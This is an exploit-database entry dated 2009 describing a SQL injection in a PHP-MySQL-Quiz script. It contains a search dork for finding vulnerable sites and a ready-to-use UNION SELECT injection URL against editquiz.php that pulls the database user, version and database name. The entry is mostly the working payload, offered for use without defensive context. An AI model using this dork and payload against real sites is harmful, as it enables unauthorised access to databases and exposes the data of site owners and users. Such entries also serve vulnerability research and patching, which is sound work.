PHP-MySQL-Quiz SQL Injection Vulnerability

2009-12-31T00:00:00
ID 1337DAY-ID-10537
Type zdt
Reporter Hussin X
Modified 2009-12-31T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================================
PHP-MySQL-Quiz SQL Injection Vulnerability
==========================================

##########################################################
#    HomE script : http://www.widgetmonkey.com/
 
#    Download    : http://www.getfreesofts.com/script_download.php?id=18744&id_1=881
 
#    DorK : inurl:quizinfo.php
 
 
 
Exploit:
 
http://www.site.com/Script/editquiz.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8--
 



#  0day.today [2018-01-01]  #